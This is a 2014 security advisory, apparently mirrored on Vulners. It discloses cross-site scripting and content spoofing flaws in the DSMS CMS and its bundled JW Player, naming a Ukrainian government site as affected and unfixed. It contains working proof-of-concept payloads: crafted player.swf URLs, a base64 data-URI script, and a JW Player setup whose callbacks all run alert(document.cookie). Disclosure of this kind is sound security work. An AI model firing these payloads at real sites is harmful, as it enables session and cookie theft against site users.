Vulners
Lucene search
DSMS Cross Site Scripting / Content Spoofing
`Hello list!
There are Cross-Site Scripting and Content Spoofing vulnerabilities in DSMS.
This is commercial CMS. It's used particularly at government site
dsmsu.gov.ua - web site of Ministry of Youth and Sport of Ukraine.
There are also other vulnerabilities in the system, about which I've
informed developers. None of the vulnerabilities were fixed.
-------------------------
Affected products:
-------------------------
Vulnerable are all versions of DSMS.
-------------------------
Affected vendors:
-------------------------
Strebul studio
http://strebul.com
----------
Details:
----------
Cross-Site Scripting (WASC-08):
http://site/templates/default/js/jwplayer/player.swf?playerready=alert(document.cookie)
http://site/templates/default/js/jwplayer/player.swf?displayclick=link&link=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B&file=1.jpg
Cross-Site Scripting (WASC-08):
If at the site at page with jwplayer.swf (player.swf) there is possibility
(via HTML Injection) to include JS code with callback-function, and there
are 19 such functions in total, then it's possible to conduct XSS attack.
I.e. JS-callbacks can be used for XSS attack.
Example of exploit:
<script type="text/javascript" src="jwplayer.js"></script>
<div id="container">...</div>
<script type="text/javascript">
jwplayer("container").setup({
flashplayer: "jwplayer.swf",
file: "1.flv",
autostart: true,
height: 300,
width: 480,
events: {
onReady: function() { alert(document.cookie); },
onComplete: function() { alert(document.cookie); },
onBufferChange: function() { alert(document.cookie); },
onBufferFull: function() { alert(document.cookie); },
onError: function() { alert(document.cookie); },
onFullscreen: function() { alert(document.cookie); },
onMeta: function() { alert(document.cookie); },
onMute: function() { alert(document.cookie); },
onPlaylist: function() { alert(document.cookie); },
onPlaylistItem: function() { alert(document.cookie); },
onResize: function() { alert(document.cookie); },
onBeforePlay: function() { alert(document.cookie); },
onPlay: function() { alert(document.cookie); },
onPause: function() { alert(document.cookie); },
onBuffer: function() { alert(document.cookie); },
onSeek: function() { alert(document.cookie); },
onIdle: function() { alert(document.cookie); },
onTime: function() { alert(document.cookie); },
onVolume: function() { alert(document.cookie); }
}
});
</script>
Content Spoofing (WASC-12):
Swf-file of JW Player accepts arbitrary addresses in parameters file and
image, which allows to spoof content of flash - i.e. by setting addresses of
video (audio) and/or image files from other site.
http://site/templates/default/js/jwplayer/player.swf?file=1.flv&backcolor=0xFFFFFF&screencolor=0xFFFFFF
http://site/templates/default/js/jwplayer/player.swf?file=1.flv&image=1.jpg
Swf-file of JW Player accepts arbitrary addresses in parameter config, which
allows to spoof content of flash - i.e. by setting address of config file
from other site (parameters file and image in xml-file accept arbitrary
addresses). For loading of config file from other site it needs to have
crossdomain.xml.
http://site/templates/default/js/jwplayer/player.swf?config=1.xml
1.xml
<config>
<file>1.flv</file>
<image>1.jpg</image>
</config>
Swf-file of JW Player accepts arbitrary addresses in parameter playlistfile,
which allows to spoof content of flash - i.e. by setting address of playlist
file from other site (parameters media:content and media:thumbnail in
xml-file accept arbitrary addresses). For loading of playlist file from
other site it needs to have crossdomain.xml.
http://site/templates/default/js/jwplayer/player.swf?playlistfile=1.rss
http://site/templates/default/js/jwplayer/player.swf?playlistfile=1.rss&playlist.position=right&playlist.size=200
1.rss
<rss version="2.0" xmlns:media="http://search.yahoo.com/mrss/">
<channel>
<title>Example playlist</title>
<item>
<title>Video #1</title>
<description>First video.</description>
<media:content url="1.flv" duration="5" />
<media:thumbnail url="1.jpg" />
</item>
<item>
<title>Video #2</title>
<description>Second video.</description>
<media:content url="2.flv" duration="5" />
<media:thumbnail url="2.jpg" />
</item>
</channel>
</rss>
------------
Timeline:
------------
2013.11.04 - informed administrators of government site. No response, no
fix.
2013.11.13 - announced at my site.
2013.11.18 - informed developers about vulnerabilities in CMS and at
dsmsu.gov.ua. They promised to fix holes in CMS and at web site, but didn't
do it.
2014.02.15 - disclosed at my site (http://websecurity.com.ua/6860/).
Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
17 Feb 2014 00:00Current
7.4High risk
Vulners AI Score7.4